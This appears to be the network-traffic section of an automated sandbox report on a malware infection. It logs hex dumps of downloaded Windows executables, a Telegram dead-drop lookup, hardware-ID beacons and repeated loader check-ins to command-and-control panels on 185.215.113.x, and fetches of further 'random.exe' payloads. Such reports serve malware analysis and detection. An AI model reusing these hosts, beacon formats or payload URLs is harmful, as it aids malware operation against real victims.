Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 01 Feb 2025 15:58:47 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Thu, 30 Jan 2025 14:34:25 GMTETag: "8a00-62ced529ccee7"Accept-Ranges: bytesContent-Length: 35328Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 cd a2 39 f4 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 80 00 00 00 08 00 00 00 00 00 00 1e 9f 00 00 00 20 00 00 00 a0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 00 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 cc 9e 00 00 4f 00 00 00 00 a0 00 00 d0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 0c 00 00 00 b0 9e 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 7f 00 00 00 20 00 00 00 80 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d0 05 00 00 00 a0 00 00 00 06 00 00 00 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 00 00 00 02 00 00 00 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9f 00 00 00 00 00 00 48 00 00 00 02 00 05 00 a4 21 00 00 0c 7d 00 00 03 00 02 00 05 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 05 00 5c 00 00 00 01 00 00 11 02 28 0f 00 00 0a 0a 28 10 00 00 0a 03 6f 11 00 00 0a 0b 06 8e 69 8d 16 00 00 01 0c 16 0d 2b 2a 08 09 06 09 91 09 1f 3b 5a 20 00 01 00 00 5d d2 61 d2 9c 08 09 8f 16 00 00 01 25 47 07 09 07 8e 69 5d 91 61 d2 52 09 17 58 0d 09 06 8e 69 32 d0 28 10 00 00 0a 08 6f 12 00 00 0a 2a 1e 02 28 13 00 00 0a 2a 13 30 07 00 9e 00 00 00 02 00 00 11 72 01 00 00 70 0a 73 14 00 00 0a 73 15 00 00 0a 0b 07 6f 16 00 00 0a 72 26 73 00 70 7e 01 00 00 04 28 01 00 00 06 6f 17 00 00 0a 26 07 6f 16 00 00 0a 72 48 73 00 70 7e 01 00 00 04 28 01 00 00 06 6f 17 00 00 0a 26 07 17 6f 18 00 00 0a 07 17 8d 19 00 00 01 25 16 06 7e 01 00 00 04 28 01 00 00 06 a2 6f 19 00 00 0a 6f 1a 00 00 0a 72 72 73 00 70 7e 01 00 00 04 28 01 00 00 06 6f 1b 00 00 0a 72 8c 73 00 70 7e 01 00 00 04 28 01 00 00 06 6f 1c 00 00 0a 14 14 6f 1d 00 00 0a 26 2a 1e 02 28 13 00 00 0a 2a 1a 28 03 00 00 06 2a 1e 02 28 13 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 01 Feb 2025 15:58:48 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Thu, 30 Jan 2025 14:32:13 GMTETag: "44200-62ced4abdebc0"Accept-Ranges: bytesContent-Length: 279040Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 80 bc 97 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 d4 02 00 00 6a 01 00 00 00 00 00 f0 41 02 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 04 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 8a 03 00 57 00 00 00 57 8a 03 00 54 01 00 00 00 30 04 00 a8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 04 00 d0 61 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 86 03 00 5c 00 00 00 00 00 00 00 00 00 00 00 d4 8e 03 00 28 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 7c d2 02 00 00 10 00 00 00 d4 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 e0 2e 72 64 61 74 61 00 00 b4 af 00 00 00 f0 02 00 00 b0 00 00 00 d8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a0 73 00 00 00 a0 03 00 00 54 00 00 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 20 04 00 00 02 00 00 00 dc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 a8 01 00 00 00 30 04 00 00 02 00 00 00 de 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d0 61 00 00 00 40 04 00 00 62 00 00 00 e0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 15:59:28 GMTContent-Type: application/octet-streamContent-Length: 3789149Last-Modified: Sat, 01 Feb 2025 10:03:34 GMTConnection: keep-aliveETag: "679df176-39d15d"Accept-Ranges: bytesData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8f 81 0b 01 02 19 00 9e 00 00 00 46 00 00 00 00 00 00 f8 a5 00 00 00 10 00 00 00 b0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 01 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 50 09 00 00 00 10 01 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 30 9d 00 00 00 10 00 00 00 9e 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 50 02 00 00 00 b0 00 00 00 04 00 00 00 a2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 90 0e 00 00 00 c0 00 00 00 00 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 50 09 00 00 00 d0 00 00 00 0a 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 08 00 00 00 00 e0 00 00 00 00 00 00 00 b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 f0 00 00 00 02 00 00 00 b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 c4 08 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 2c 00 00 00 10 01 00 00 2c 00 00 00 b2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 00 00 00 00 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET /m08mbk HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /m08mbk HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cacheCookie: stel_ssid=fad231852a23212aa4_14628175053678802113
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.115Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHIECBAFBFHIJKFIJDAKHost: 185.215.113.115Content-Length: 209Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 48 49 45 43 42 41 46 42 46 48 49 4a 4b 46 49 4a 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 43 36 33 31 43 31 35 31 45 39 36 39 36 36 30 36 35 39 30 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 45 43 42 41 46 42 46 48 49 4a 4b 46 49 4a 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6b 69 72 61 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 45 43 42 41 46 42 46 48 49 4a 4b 46 49 4a 44 41 4b 2d 2d 0d 0a Data Ascii: ------FHIECBAFBFHIJKFIJDAKContent-Disposition: form-data; name="hwid"6C631C151E9696606590------FHIECBAFBFHIJKFIJDAKContent-Disposition: form-data; name="build"kira------FHIECBAFBFHIJKFIJDAK--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 36 32 31 34 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1062141001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/Cyber_Yoda/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 36 32 31 34 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1062142001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/asjduwgsgausi/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 36 32 31 34 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1062143001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/sawdu5t/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 36 32 31 34 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1062144001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/c0dxnfz/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 36 32 31 34 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1062145001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/sunnywebZ/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 36 32 31 34 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1062146001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /boom/tvhaqk.exe HTTP/1.1fDsdWpC1Kr1ADlJEQf5TUrSTrY2h2u41sMkrsfhwLwlxIQCB6y: VtAoUiLGBN8JuIRrrC1tFjmxppXCaGpKltJpaX9l7d4gYg3aW4Host: 147.45.44.42Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /boom/uykb.exe HTTP/1.1fDsdWpC1Kr1ADlJEQf5TUrSTrY2h2u41sMkrsfhwLwlxIQCB6y: VtAoUiLGBN8JuIRrrC1tFjmxppXCaGpKltJpaX9l7d4gYg3aW4Host: 147.45.44.42
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: GET /files/initlosizz198hyjdr/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 36 32 31 34 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1062147001&unit=246122658369
